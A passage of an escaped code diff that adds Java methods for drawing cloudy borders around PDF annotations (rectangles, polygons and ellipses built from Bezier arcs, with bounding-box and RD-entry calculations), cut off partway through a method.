    ", + "+ * This can be used for Square and FreeText annotations. However, this does", + "+ * not produce the text and the callout line for FreeTexts.", + "+ *", + "+ * @param rd entry RD, or null if the entry does not exist", + "+ * @throws IOException If there is an error writing to the stream.", + "+ */", + "+ void createCloudyRectangle(PDRectangle rd) throws IOException", + "+ {", + "+ rectWithDiff = applyRectDiff(rd, lineWidth / 2);", + "+ double left = rectWithDiff.getLowerLeftX();", + "+ double bottom = rectWithDiff.getLowerLeftY();", + "+ double right = rectWithDiff.getUpperRightX();", + "+ double top = rectWithDiff.getUpperRightY();", + "+", + "+ cloudyRectangleImpl(left, bottom, right, top, false);", + "+ finish();", + "+ }", + "+", + "+ /**", + "+ * Creates a cloudy border for a Polygon annotation.", + "+ *", + "+ * @param path polygon path", + "+ * @throws IOException If there is an error writing to the stream.", + "+ */", + "+ void createCloudyPolygon(float[][] path) throws IOException", + "+ {", + "+ int n = path.length;", + "+ Point2D.Double[] polygon = new Point2D.Double[n];", + "+", + "+ for (int i = 0; i < n; i++)", + "+ {", + "+ float[] array = path[i];", + "+ if (array.length == 2)", + "+ {", + "+ polygon[i] = new Point2D.Double(array[0], array[1]);", + "+ }", + "+ else if (array.length == 6)", + "+ {", + "+ // TODO Curve segments are not yet supported in cloudy border.", + "+ polygon[i] = new Point2D.Double(array[4], array[5]);", + "+ }", + "+ }", + "+", + "+ cloudyPolygonImpl(polygon, false);", + "+ finish();", + "+ }", + "+", + "+ /**", + "+ * Creates a cloudy border for a Circle annotation.", + "+ * The ellipse is specified by the RD entry and the", + "+ * Rect entry that was passed in to the constructor.", + "+ *", + "+ * @param rd entry RD, or null if the entry does not exist", + "+ * @throws IOException If there is an error writing to the stream.", + "+ */", + "+ void createCloudyEllipse(PDRectangle rd) throws IOException", + "+ {", + "+ rectWithDiff = applyRectDiff(rd, 0);", + "+ double left = rectWithDiff.getLowerLeftX();", + "+ double bottom = rectWithDiff.getLowerLeftY();", + "+ double right = rectWithDiff.getUpperRightX();", + "+ double top = rectWithDiff.getUpperRightY();", + "+", + "+ cloudyEllipseImpl(left, bottom, right, top);", + "+ finish();", + "+ }", + "+", + "+ /**", + "+ * Returns the BBox entry (bounding box) for the", + "+ * appearance stream form XObject.", + "+ *", + "+ * @return Bounding box for appearance stream form XObject.", + "+ */", + "+ PDRectangle getBBox()", + "+ {", + "+ return getRectangle();", + "+ }", + "+", + "+ /**", + "+ * Returns the updated Rect entry for the annotation.", + "+ * The rectangle completely contains the cloudy border.", + "+ *", + "+ * @return Annotation Rect.", + "+ */", + "+ PDRectangle getRectangle()", + "+ {", + "+ return new PDRectangle((float)bboxMinX, (float)bboxMinY,", + "+ (float)(bboxMaxX - bboxMinX), (float)(bboxMaxY - bboxMinY));", + "+ }", + "+", + "+ /**", + "+ * Returns the Matrix entry for the appearance stream form XObject.", + "+ *", + "+ * @return Matrix for appearance stream form XObject.", + "+ */", + "+ AffineTransform getMatrix()", + "+ {", + "+ return AffineTransform.getTranslateInstance(-bboxMinX, -bboxMinY);", + "+ }", + "+", + "+ /**", + "+ * Returns the updated RD entry for Square and Circle annotations.", + "+ *", + "+ * @return Annotation RD value.", + "+ */", + "+ PDRectangle getRectDifference()", + "+ {", + "+ if (annotRect == null)", + "+ {", + "+ float d = (float)lineWidth / 2;", + "+ return new PDRectangle(d, d, (float)lineWidth, (float)lineWidth);", + "+ }", + "+", + "+ PDRectangle re = (rectWithDiff != null) ? rectWithDiff : annotRect;", + "+", + "+ float left = re.getLowerLeftX() - (float)bboxMinX;", + "+ float bottom = re.getLowerLeftY() - (float)bboxMinY;", + "+ float right = (float)bboxMaxX - re.getUpperRightX();", + "+ float top = (float)bboxMaxY - re.getUpperRightY();", + "+", + "+ return new PDRectangle(left, bottom, right - left, top - bottom);", + "+ }", + "+", + "+ private static double cosine(double dx, double hypot)", + "+ {", + "+ if (Double.compare(hypot, 0.0) == 0)", + "+ {", + "+ return 0;", + "+ }", + "+ return dx / hypot;", + "+ }", + "+", + "+ private static double sine(double dy, double hypot)", + "+ {", + "+ if (Double.compare(hypot, 0.0) == 0)", + "+ {", + "+ return 0;", + "+ }", + "+ return dy / hypot;", + "+ }", + "+", + "+ /**", + "+ * Cloudy rectangle implementation is based on converting the rectangle", + "+ * to a polygon.", + "+ */", + "+ private void cloudyRectangleImpl(double left, double bottom,", + "+ double right, double top, boolean isEllipse) throws IOException", + "+ {", + "+ double w = right - left, h = top - bottom;", + "+", + "+ if (intensity <= 0.0)", + "+ {", + "+ output.addRect((float)left, (float)bottom, (float)w, (float)h);", + "+ bboxMinX = left;", + "+ bboxMinY = bottom;", + "+ bboxMaxX = right;", + "+ bboxMaxY = top;", + "+ return;", + "+ }", + "+", + "+ // Make a polygon with direction equal to the positive angle direction.", + "+ Point2D.Double[] polygon;", + "+", + "+ if (w < 1.0)", + "+ {", + "+ polygon = new Point2D.Double[]", + "+ {", + "+ new Point2D.Double(left, bottom), new Point2D.Double(left, top),", + "+ new Point2D.Double(left, bottom)", + "+ };", + "+ }", + "+ else if (h < 1.0)", + "+ {", + "+ polygon = new Point2D.Double[]", + "+ {", + "+ new Point2D.Double(left, bottom), new Point2D.Double(right, bottom),", + "+ new Point2D.Double(left, bottom)", + "+ };", + "+ }", + "+ else", + "+ {", + "+ polygon = new Point2D.Double[]", + "+ {", + "+ new Point2D.Double(left, bottom), new Point2D.Double(right, bottom),", + "+ new Point2D.Double(right, top), new Point2D.Double(left, top),", + "+ new Point2D.Double(left, bottom)", + "+ };", + "+ }", + "+", + "+ cloudyPolygonImpl(polygon, isEllipse);", + "+ }", + "+", + "+ /**", + "+ * Cloudy polygon implementation.", + "+ *", + "+ * @param vertices polygon vertices; first and last point must be equal", + "+ * @param isEllipse specifies if the polygon represents an ellipse", + "+ */", + "+ private void cloudyPolygonImpl(Point2D.Double[] vertices, boolean isEllipse)", + "+ throws IOException", + "+ {", + "+ Point2D.Double[] polygon = removeZeroLengthSegments(vertices);", + "+ getPositivePolygon(polygon);", + "+ int numPoints = polygon.length;", + "+", + "+ if (numPoints < 2)", + "+ {", + "+ return;", + "+ }", + "+ if (intensity <= 0.0)", + "+ {", + "+ moveTo(polygon[0]);", + "+ for (int i = 1; i < numPoints; i++)", + "+ {", + "+ lineTo(polygon[i]);", + "+ }", + "+ return;", + "+ }", + "+", + "+ double cloudRadius = isEllipse ? getEllipseCloudRadius() : getPolygonCloudRadius();", + "+", + "+ if (cloudRadius < 0.5)", + "+ {", + "+ cloudRadius = 0.5;", + "+ }", + "+", + "+ final double k = Math.cos(ANGLE_34_DEG);", + "+ final double advIntermDefault = 2 * k * cloudRadius;", + "+ final double advCornerDefault = k * cloudRadius;", + "+ double[] array = new double[2];", + "+ double anglePrev = 0;", + "+", + "+ // The number of curls per polygon segment is hardly ever an integer,", + "+ // so the length of some curls must be adjustable. We adjust the angle", + "+ // of the trailing arc of corner curls and the leading arc of the first", + "+ // intermediate curl.", + "+ // In each polygon segment, we have n intermediate curls plus one half of a", + "+ // corner curl at each end. One of the n intermediate curls is adjustable.", + "+ // Thus the number of fixed (or unadjusted) intermediate curls is n - 1.", + "+", + "+ // Find the adjusted angle `alpha` for the first corner curl.", + "+ int n0 = computeParamsPolygon(advIntermDefault, advCornerDefault, k, cloudRadius,", + "+ polygon[numPoints - 2].distance(polygon[0]), array);", + "+ double alphaPrev = (n0 == 0) ? array[0] : ANGLE_34_DEG;", + "+", + "+ for (int j = 0; j + 1 < numPoints; j++)", + "+ {", + "+ Point2D.Double pt = polygon[j];", + "+ Point2D.Double ptNext = polygon[j + 1];", + "+ double length = pt.distance(ptNext);", + "+ if (Double.compare(length, 0.0) == 0)", + "+ {", + "+ alphaPrev = ANGLE_34_DEG;", + "+ continue;", + "+ }", + "+", + "+ // n is the number of intermediate curls in the current polygon segment.", + "+ int n = computeParamsPolygon(advIntermDefault, advCornerDefault, k,", + "+ cloudRadius, length, array);", + "+ if (n < 0)", + "+ {", + "+ if (!outputStarted)", + "+ {", + "+ moveTo(pt);", + "+ }", + "+ continue;", + "+ }", + "+", + "+ double alpha = array[0], dx = array[1];", + "+ double angleCur = Math.atan2(ptNext.y - pt.y, ptNext.x - pt.x);", + "+ if (j == 0)", + "+ {", + "+ Point2D.Double ptPrev = polygon[numPoints - 2];", + "+ anglePrev = Math.atan2(pt.y - ptPrev.y, pt.x - ptPrev.x);", + "+ }", + "+", + "+ double cos = cosine(ptNext.x - pt.x, length);", + "+ double sin = sine(ptNext.y - pt.y, length);", + "+ double x = pt.x;", + "+ double y = pt.y;", + "+", + "+ addCornerCurl(anglePrev, angleCur, cloudRadius, pt.x, pt.y, alpha,", + "+ alphaPrev, !outputStarted);", + "+ // Proceed to the center point of the first intermediate curl.", + "+ double adv = 2 * k * cloudRadius + 2 * dx;", + "+ x += adv * cos;", + "+ y += adv * sin;", + "+", + "+ // Create the first intermediate curl.", + "+ int numInterm = n;", + "+ if (n >= 1)", + "+ {", + "+ addFirstIntermediateCurl(angleCur, cloudRadius, alpha, x, y);", + "+ x += advIntermDefault * cos;", + "+ y += advIntermDefault * sin;", + "+ numInterm = n - 1;", + "+ }", + "+", + "+ // Create one intermediate curl and replicate it along the polygon segment.", + "+ Point2D.Double[] template = getIntermediateCurlTemplate(angleCur, cloudRadius);", + "+ for (int i = 0; i < numInterm; i++)", + "+ {", + "+ outputCurlTemplate(template, x, y);", + "+ x += advIntermDefault * cos;", + "+ y += advIntermDefault * sin;", + "+ }", + "+", + "+ anglePrev = angleCur;", + "+ alphaPrev = (n == 0) ? alpha : ANGLE_34_DEG;", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Computes parameters for a cloudy polygon: n, alpha, and dx.", + "+ */", + "+ private int computeParamsPolygon(double advInterm, double advCorner, double k,", + "+ double r, double length, double[] array)", + "+ {", + "+ if (Double.compare(length, 0.0) == 0)", + "+ {", + "+ array[0] = ANGLE_34_DEG;", + "+ array[1] = 0;", + "+ return -1;", + "+ }", + "+", + "+ // n is the number of intermediate curls in the current polygon segment", + "+ int n = (int) Math.ceil((length - 2 * advCorner) / advInterm);", + "+", + "+ // Fitting error along polygon segment", + "+ double e = length - (2 * advCorner + n * advInterm);", + "+ // Fitting error per each adjustable half curl", + "+ double dx = e / 2;", + "+", + "+ // Convert fitting error to an angle that can be used to control arcs.", + "+ double arg = (k * r + dx) / r;", + "+ double alpha = (arg < -1.0 || arg > 1.0) ? 0.0 : Math.acos(arg);", + "+", + "+ array[0] = alpha;", + "+ array[1] = dx;", + "+ return n;", + "+ }", + "+", + "+ /**", + "+ * Creates a corner curl for polygons and ellipses.", + "+ */", + "+ private void addCornerCurl(double anglePrev, double angleCur, double radius,", + "+ double cx, double cy, double alpha, double alphaPrev, boolean addMoveTo)", + "+ throws IOException", + "+ {", + "+ double a = anglePrev + ANGLE_180_DEG + alphaPrev;", + "+ double b = anglePrev + ANGLE_180_DEG + alphaPrev - Math.toRadians(22);", + "+ getArcSegment(a, b, cx, cy, radius, radius, null, addMoveTo);", + "+", + "+ a = b;", + "+ b = angleCur - alpha;", + "+ getArc(a, b, radius, radius, cx, cy, null, false);", + "+ }", + "+", + "+ /**", + "+ * Generates the first intermediate curl for a cloudy polygon.", + "+ */", + "+ private void addFirstIntermediateCurl(double angleCur, double r, double alpha,", + "+ double cx, double cy) throws IOException", + "+ {", + "+ final double D = Math.toRadians(30);", + "+ double a = angleCur + ANGLE_180_DEG;", + "+", + "+ getArcSegment(a + alpha, a + alpha - D, cx, cy, r, r, null, false);", + "+ getArcSegment(a + alpha - D, a + ANGLE_90_DEG, cx, cy, r, r, null, false);", + "+ getArcSegment(a + ANGLE_90_DEG, a + ANGLE_180_DEG - ANGLE_34_DEG,", + "+ cx, cy, r, r, null, false);", + "+ }", + "+", + "+ /**", + "+ * Returns a template for intermediate curls in a cloudy polygon.", + "+ */", + "+ private Point2D.Double[] getIntermediateCurlTemplate(double angleCur, double r)", + "+ throws IOException", + "+ {", + "+ ArrayList points = new ArrayList<>();", + "+ double a = angleCur + ANGLE_180_DEG;", + "+", + "+ getArcSegment(a + ANGLE_34_DEG, a + ANGLE_12_DEG, 0, 0, r, r, points, false);", + "+ getArcSegment(a + ANGLE_12_DEG, a + ANGLE_90_DEG, 0, 0, r, r, points, false);", + "+ getArcSegment(a + ANGLE_90_DEG, a + ANGLE_180_DEG - ANGLE_34_DEG,", + "+ 0, 0, r, r, points, false);", + "+", + "+ return points.toArray(new Point2D.Double[points.size()]);", + "+ }", + "+", + "+ /**", + "+ * Writes the curl template points to the output and applies translation (x, y).", + "+ */", + "+ private void outputCurlTemplate(Point2D.Double[] template, double x, double y)", + "+ throws IOException", + "+ {", + "+ int n = template.length, i = 0;", + "+ if ((n % 3) == 1)", + "+ {", + "+ Point2D.Double a = template[0];", + "+ moveTo(a.x + x, a.y + y);", + "+ i++;", + "+ }", + "+ for (; i + 2 < n; i += 3)", + "+ {", + "+ Point2D.Double a = template[i];", + "+ Point2D.Double b = template[i + 1];", + "+ Point2D.Double c = template[i + 2];", + "+ curveTo(a.x + x, a.y + y, b.x + x, b.y + y, c.x + x, c.y + y);", + "+ }", + "+ }", + "+", + "+ private PDRectangle applyRectDiff(PDRectangle rd, double min)", + "+ {", + "+ float rectLeft = annotRect.getLowerLeftX();", + "+ float rectBottom = annotRect.getLowerLeftY();", + "+ float rectRight = annotRect.getUpperRightX();", + "+ float rectTop = annotRect.getUpperRightY();", + "+", + "+ // Normalize", + "+ rectLeft = Math.min(rectLeft, rectRight);", + "+ rectBottom = Math.min(rectBottom, rectTop);", + "+ rectRight = Math.max(rectLeft, rectRight);", + "+ rectTop = Math.max(rectBottom, rectTop);", + "+", + "+ double rdLeft, rdBottom, rdRight, rdTop;", + "+", + "+ if (rd != null)", + "+ {", + "+ rdLeft = Math.max(rd.getLowerLeftX(), min);", + "+ rdBottom = Math.max(rd.getLowerLeftY(), min);", + "+ rdRight = Math.max(rd.getUpperRightX(), min);", + "+ rdTop = Math.max(rd.getUpperRightY(), min);", + "+ }", + "+ else", + "+ {", + "+ rdLeft = min;", + "+ rdBottom = min;", + "+ rdRight = min;", + "+ rdTop = min;", + "+ }", + "+", + "+ rectLeft += rdLeft;", + "+ rectBottom += rdBottom;", + "+ rectRight -= rdRight;", + "+ rectTop -= rdTop;", + "+", + "+ return new PDRectangle(rectLeft, rectBottom, rectRight - rectLeft, rectTop - rectBottom);", + "+ }", + "+", + "+ private void reversePolygon(Point2D.Double[] points)", + "+ {", + "+ int len = points.length;", + "+ int n = len / 2;", + "+ for (int i = 0; i < n; i++)", + "+ {", + "+ int j = len - i - 1;", + "+ Point2D.Double pi = points[i];", + "+ Point2D.Double pj = points[j];", + "+ points[i] = pj;", + "+ points[j] = pi;", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Makes a polygon whose direction is the same as the positive angle", + "+ * direction in the coordinate system.", + "+ * The polygon must not intersect itself.", + "+ */", + "+ private void getPositivePolygon(Point2D.Double[] points)", + "+ {", + "+ if (getPolygonDirection(points) < 0)", + "+ {", + "+ reversePolygon(points);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Returns the direction of the specified polygon.", + "+ * A positive value indicates that the polygon's direction is the same as the", + "+ * direction of positive angles in the coordinate system.", + "+ * A negative value indicates the opposite direction.", + "+ *", + "+ * The polygon must not intersect itself. A 2-point polygon is not acceptable.", + "+ * This is based on the \"shoelace formula\".", + "+ */", + "+ private double getPolygonDirection(Point2D.Double[] points)", + "+ {", + "+ double a = 0;", + "+ int len = points.length;", + "+ for (int i = 0; i < len; i++)", + "+ {", + "+ int j = (i + 1) % len;", + "+ a += points[i].x * points[j].y - points[i].y * points[j].x;", + "+ }", + "+ return a;", + "+ }", + "+", + "+ /**", + "+ * Creates one or more Bezier curves that represent an elliptical arc.", + "+ * Angles are in radians.", + "+ * The arc will always proceed in the positive angle direction.", + "+ * If the argument `out` is null, this writes the results to the instance", + "+ * variable `output`.", + "+ */", + "+ private void getArc(double startAng, double endAng, double rx, double ry,", + "+ double cx, double cy, ArrayList out, boolean addMoveTo) throws IOException", + "+ {", + "+ final double angleIncr = Math.PI / 2;", + "+ double startx = rx * Math.cos(startAng) + cx;", + "+ double starty = ry * Math.sin(startAng) + cy;", + "+", + "+ double angleTodo = endAng - startAng;", + "+ while (angleTodo < 0)", + "+ {", + "+ angleTodo += 2 * Math.PI;", + "+ }", + "+ double sweep = angleTodo, angleDone = 0;", + "+", + "+ if (addMoveTo)", + "+ {", + "+ if (out != null)", + "+ {", + "+ out.add(new Point2D.Double(startx, starty));", + "+ }", + "+ else", + "+ {", + "+ moveTo(startx, starty);", + "+ }", + "+ }", + "+", + "+ while (angleTodo > angleIncr)", + "+ {", + "+ getArcSegment(startAng + angleDone,", + "+ startAng + angleDone + angleIncr, cx, cy, rx, ry, out, false);", + "+ angleDone += angleIncr;", + "+ angleTodo -= angleIncr;", + "+ }", + "+", + "+ if (angleTodo > 0)", + "+ {", + "+ getArcSegment(startAng + angleDone, startAng + sweep, cx, cy, rx, ry, out, false);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Creates a single Bezier curve that represents a section of an elliptical", + "+ * arc. The sweep angle of the section must not be larger than 90 degrees.", + "+ * If argument `out` is null, this writes the results to the instance", + "+ * variable `output`.", + "+ */", + "+ private void getArcSegment(double startAng, double endAng, double cx, double cy,", + "+ double rx, double ry, ArrayList out, boolean addMoveTo) throws IOException", + "+ {", + "+ // Algorithm is from the FAQ of the news group comp.text.pdf", + "+", + "+ double cos_a = Math.cos(startAng);", + "+ double sin_a = Math.sin(startAng);", + "+ double cos_b = Math.cos(endAng);", + "+ double sin_b = Math.sin(endAng);", + "+ double denom = Math.sin((endAng - startAng) / 2.0);", + "+ if (Double.compare(denom, 0.0) == 0)", + "+ {", + "+ // This can happen only if endAng == startAng.", + "+ // The arc sweep angle is zero, so we create no arc at all.", + "+ if (addMoveTo)", + "+ {", + "+ double xs = cx + rx * cos_a;", + "+ double ys = cy + ry * sin_a;", + "+ if (out != null)", + "+ {", + "+ out.add(new Point2D.Double(xs, ys));", + "+ }", + "+ else", + "+ {", + "+ moveTo(xs, ys);", + "+ }", + "+ }", + "+ return;", + "+ }", + "+ double bcp = 1.333333333 * (1 - Math.cos((endAng - startAng) / 2.0)) / denom;", + "+ double p1x = cx + rx * (cos_a - bcp * sin_a);", + "+ double p1y = cy + ry * (sin_a + bcp * cos_a);", + "+ double p2x = cx + rx * (cos_b + bcp * sin_b);", + "+ double p2y = cy + ry * (sin_b - bcp * cos_b);", + "+ double p3x = cx + rx * cos_b;", + "+ double p3y = cy + ry * sin_b;", + "+", + "+ if (addMoveTo)", + "+ {", + "+ double xs = cx + rx * cos_a;", + "+ double ys = cy + ry * sin_a;", + "+ if (out != null)", + "+ {", + "+ out.add(new Point2D.Double(xs, ys));", + "+ }", + "+ else", + "+ {", + "+ moveTo(xs, ys);", + "+ }", + "+ }", + "+", + "+ if (out != null)", + "+ {", + "+ out.add(new Point2D.Double(p1x, p1y));", + "+ out.add(new Point2D.Double(p2x, p2y));", + "+ out.add(new Point2D.Double(p3x, p3y));", + "+ }", + "+ else", + "+ {", + "+ curveTo(p1x, p1y, p2x, p2y, p3x, p3y);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Flattens an ellipse into a polygon.", + "+ */", + "+ private static Point2D.Double[] flattenEllipse(double left, double bottom,", + "+ double right, double top)", + "+ {", + "+ Ellipse2D.Double ellipse = new Ellipse2D.Double(left, bottom, right - left, top - bottom);", + "+ final double flatness = 0.50;", + "+ PathIterator iterator = ellipse.getPathIterator(null, flatness);", + "+ double[] coords = new double[6];", + "+ ArrayList points = new ArrayList<>();", + "+", + "+ while (!iterator.isDone())", + "+ {", + "+ switch (iterator.currentSegment(coords))", + "+ {", + "+ case PathIterator.SEG_MOVETO:", + "+ case PathIterator.SEG_LINETO:", + "+ points.add(new Point2D.Double(coords[0], coords[1]));", + "+ break;", + "+ // Curve segments are not expected because the path iterator is", + "+ // flattened. SEG_CLOSE can be ignored.", + "+ }", + "+ iterator.next();", + "+ }", + "+", + "+ int size = points.size();", + "+ final double closeTestLimit = 0.05;", + "+", + "+ if (size >= 2 && points.get(size - 1).distance(points.get(0)) > closeTestLimit)", + "+ {", + "+ points.add(points.get(points.size() - 1));", + "+ }", + "+ return points.toArray(new Point2D.Double[points.size()]);", + "+ }", + "+", + "+ /**", + "+ * Cloudy ellipse implementation.", + "+ */", + "+ private void cloudyEllipseImpl(final double leftOrig, final double bottomOrig,", + "+ final double rightOrig, final double topOrig) throws IOException", + "+ {", + "+ if (intensity <= 0.0)", + "+ {", + "+ drawBasicEllipse(leftOrig, bottomOrig, rightOrig, topOrig);", + "+ return;", + "+ }", + "+", + "+ double left = leftOrig, bottom = bottomOrig, right = rightOrig, top = topOrig;", + "+ double width = right - left, height = top - bottom;", + "+ double cloudRadius = getEllipseCloudRadius();", + "+", + "+ // Omit cloudy border if the ellipse is very small.", + "+ final double threshold1 = 0.50 * cloudRadius;", + "+ if (width < threshold1 && height < threshold1)", + "+ {", + "+ drawBasicEllipse(left, bottom, right, top);", + "+ return;", + "+ }", + "+", + "+ // Draw a cloudy rectangle instead of an ellipse when the", + "+ // width or height is very small.", + "+ final double threshold2 = 5;", + "+ if ((width < threshold2 && height > 20) || (width > 20 && height < threshold2))", + "+ {", + "+ cloudyRectangleImpl(left, bottom, right, top, true);", + "+ return;", + "+ }", + "+", + "+ // Decrease radii (while center point does not move). This makes the", + "+ // \"tails\" of the curls almost touch the ellipse outline.", + "+ double radiusAdj = Math.sin(ANGLE_12_DEG) * cloudRadius - 1.50;", + "+ if (width > 2 * radiusAdj)", + "+ {", + "+ left += radiusAdj;", + "+ right -= radiusAdj;", + "+ }", + "+ else", + "+ {", + "+ double mid = (left + right) / 2;", + "+ left = mid - 0.10;", + "+ right = mid + 0.10;", + "+ }", + "+ if (height > 2 * radiusAdj)", + "+ {", + "+ top -= radiusAdj;", + "+ bottom += radiusAdj;", + "+ }", + "+ else", + "+ {", + "+ double mid = (top + bottom) / 2;", + "+ top = mid + 0.10;", + "+ bottom = mid - 0.10;", + "+ }", + "+", + "+ // Flatten the ellipse into a polygon. The segment lengths of the flattened", + "+ // result don't need to be extremely short because the loop below is able to", + "+ // interpolate between polygon points when it computes the center points", + "+ // at which each curl is placed.", + "+", + "+ Point2D.Double[] flatPolygon = flattenEllipse(left, bottom, right, top);", + "+ int numPoints = flatPolygon.length;", + "+ if (numPoints < 2)", + "+ {", + "+ return;", + "+ }", + "+", + "+ double totLen = 0;", + "+ for(int i = 1; i < numPoints; i++){", + "+ totLen += flatPolygon[i - 1].distance(flatPolygon[i]);", + "+ }", + "+", + "+ final double k = Math.cos(ANGLE_34_DEG);", + "+ double curlAdvance = 2 * k * cloudRadius;", + "+ int n = (int) Math.ceil(totLen / curlAdvance);", + "+ if (n < 2)", + "+ {", + "+ drawBasicEllipse(leftOrig, bottomOrig, rightOrig, topOrig);", + "+ return;", + "+ }", + "+", + "+ curlAdvance = totLen / n;", + "+ cloudRadius = curlAdvance / (2 * k);", + "+", + "+ if (cloudRadius < 0.5)", + "+ {", + "+ cloudRadius = 0.5;", + "+ curlAdvance = 2 * k * cloudRadius;", + "+ }", + "+ else if (cloudRadius < 3.0)", + "+ {", + "+ // Draw a small circle when the scaled radius becomes very small.", + "+ // This happens also if intensity is much smaller than 1.", + "+ drawBasicEllipse(leftOrig, bottomOrig, rightOrig, topOrig);", + "+ return;", + "+ }", + "+", + "+ // Construct centerPoints array, in which each point is the center point of a curl.", + "+ // The length of each centerPoints segment ideally equals curlAdv but that", + "+ // is not true in regions where the ellipse curvature is high.", + "+", + "+ int centerPointsLength = n;", + "+ Point2D.Double[] centerPoints = new Point2D.Double[centerPointsLength];", + "+ int centerPointsIndex = 0;", + "+ double lengthRemain = 0;", + "+ final double comparisonToler = lineWidth * 0.10;", + "+", + "+ for (int i = 0; i + 1 < numPoints; i++)", + "+ {", + "+ Point2D.Double p1 = flatPolygon[i];", + "+ Point2D.Double p2 = flatPolygon[i + 1];", + "+ double dx = p2.x - p1.x, dy = p2.y - p1.y;", + "+ double length = p1.distance(p2);", + "+ if (Double.compare(length, 0.0) == 0)", + "+ {", + "+ continue;", + "+ }", + "+ double lengthTodo = length + lengthRemain;", + "+ if (lengthTodo >= curlAdvance - comparisonToler || i == numPoints - 2)", + "+ {", + "+ double cos = cosine(dx, length), sin = sine(dy, length);", + "+ double d = curlAdvance - lengthRemain;", + "+ do", + "+ {", + "+ double x = p1.x + d * cos;", + "+ double y = p1.y + d * sin;", + "+ if (centerPointsIndex < centerPointsLength)", + "+ {", + "+ centerPoints[centerPointsIndex++] = new Point2D.Double(x, y);", + "+ }", + "+ lengthTodo -= curlAdvance;", + "+ d += curlAdvance;", + "+ }", + "+ while (lengthTodo >= curlAdvance - comparisonToler);", + "+", + "+ lengthRemain = lengthTodo;", + "+ if (lengthRemain < 0)", + "+ {", + "+ lengthRemain = 0;", + "+ }", + "+ }", + "+ else", + "+ {", + "+ lengthRemain += length;", + "+ }", + "+ }", + "+", + "+ // Note: centerPoints does not repeat the first point as the last point", + "+ // to create a \"closing\" segment.", + "+", + "+ // Place a curl at each point of the centerPoints array.", + "+ // In regions where the ellipse curvature is high, the centerPoints segments", + "+ // are shorter than the actual distance along the ellipse. Thus we must", + "+ // again compute arc adjustments like in cloudy polygons.", + "+", + "+ numPoints = centerPointsIndex;", + "+ double anglePrev = 0, alphaPrev = 0;", + "+", + "+ for (int i = 0; i < numPoints; i++)", + "+ {", + "+ int idxNext = i + 1;", + "+ if (i + 1 >= numPoints)", + "+ {", + "+ idxNext = 0;", + "+ }", + "+ Point2D.Double pt = centerPoints[i];", + "+ Point2D.Double ptNext = centerPoints[idxNext];", + "+", + "+ if (i == 0)", + "+ {", + "+ Point2D.Double ptPrev = centerPoints[numPoints - 1];", + "+ anglePrev = Math.atan2(pt.y - ptPrev.y, pt.x - ptPrev.x);", + "+ alphaPrev = computeParamsEllipse(ptPrev, pt, cloudRadius, curlAdvance);", + "+ }", + "+", + "+ double angleCur = Math.atan2(ptNext.y - pt.y, ptNext.x - pt.x);", + "+ double alpha = computeParamsEllipse(pt, ptNext, cloudRadius, curlAdvance);", + "+", + "+ addCornerCurl(anglePrev, angleCur, cloudRadius, pt.x, pt.y, alpha,", + "+ alphaPrev, !outputStarted);", + "+", + "+ anglePrev = angleCur;", + "+ alphaPrev = alpha;", + "+ }", + "+ }", + "+", + "+ /**", + "+ * Computes the alpha parameter for an ellipse curl.", + "+ */", + "+ private double computeParamsEllipse(Point2D.Double pt, Point2D.Double ptNext,", + "+ double r, double curlAdv)", + "+ {", + "+ double length = pt.distance(ptNext);", + "+ if (Double.compare(length, 0.0) == 0)", + "+ {", + "+ return ANGLE_34_DEG;", + "+ }", + "+", + "+ double e = length - curlAdv;", + "+ double arg = (curlAdv / 2 + e / 2) / r;", + "+ return (arg < -1.0 || arg > 1.0) ? 0.0 : Math.acos(arg);", + "+ }", + "+", + "+ private Point2D.Double[] removeZeroLengthSegments(Point2D.Double[] polygon)", + "+ {", + "+ int np = polygon.length;", + "+ if (np <= 2)", + "+ {", + "+ return polygon;", + "+ }", + "+", + "+ final double toler = 0.50;", + "+ int npNew = np;", + "+ Point2D.Double ptPrev = polygon[0];", + "+", + "+ // Don't remove the last point if it equals the first point.", + "+ for (int i = 1; i < np; i++)", + "+ {", + "+ Point2D.Double pt = polygon[i];", + "+ if (Math.abs(pt.x - ptPrev.x) < toler && Math.abs(pt.y - ptPrev.y) < toler)", + "+ {", + "+ polygon[i] = null;", + "+ npNew--;", + "+ }", + "+ ptPrev = pt;", + "+ }", + "+", + "+ if (npNew == np)", + "+ {", + "+ return polygon;", + "+ }", + "+", + "+ Point2D.Double[] polygonNew = new Point2D.Double[npNew];", + "+ int j = 0;", + "+ for (int i = 0; i < np; i++)", + "+ {", + "+ Point2D.Double pt = polygon[i];", + "+ if (pt != null)", + "+ {", + "+ polygonNew[j++] = pt;", + "+ }", + "+ }", + "+", + "+ return polygonNew;", + "+ }", + "+", + "+ /**", + "+ * Draws an ellipse without a cloudy border effect.", + "+ */", + "+ private void drawBasicEllipse(double left, double bottom, double right, double top)", + "+ throws IOException", + "+ {", + "+ double rx = Math.abs(right - left) / 2;", + "+ double ry = Math.abs(top - bottom) / 2;", + "+ double cx = (left + right) / 2;", + "+ double cy = (bottom + top) / 2;", + "+ getArc(0, 2 * Math.PI, rx, ry, cx, cy, null, true);", + "+ }", + "+", + "+ private void beginOutput(double x, double y) throws IOException", + "+ {", + "+ bboxMinX = x;", + "+ bboxMinY = y;", + "+ bboxMaxX = x;", + "+ bboxMaxY = y;", + "+ outputStarted = true;", + "+ // Set line join to bevel to avoid spikes", + "+ output.setLineJoinStyle(2);", + "+ }", + "+", + "+ private void updateBBox(double x, double y)", + "+ {", + "+ bboxMinX = Math.min(bboxMinX, x);", + "+ bboxMinY = Math.min(bboxMinY, y);", + "+ bboxMaxX = Math.max(bboxMaxX, x);", + "+ bboxMaxY = Math.max(bboxMaxY, y);", + "+ }", + "+", + "+ private void moveTo(Point2D.Double p) throws IOException", + "+ {", + "+ moveTo(p.x, p.y);", + "+ }", + "+", + "+ private void moveTo(double x, double y) throws IOException", + "+ {", + "+ if (outputStarted)", + "+ {", + "+ updateBBox(x, y);", + "+ }", + "+ else", + "+ {", + "+ beginOutput(x, y);", + "+ }", + "+", + "+ output.moveTo((float)x, (float)y);", + "+ }", + "+", + "+ private void lineTo(Point2D.Double p) throws IOException", + "+ {", + "+ lineTo(p.x, p.y);", + "+ }", + "+", + "+ private void lineTo(double x, double y) throws IOException", + "+ {", + "+ if (outputStarted)", + "+ {", + "+ updateBBox(x, y);", + "+ }", + "+ else", + "+ {", + "+ 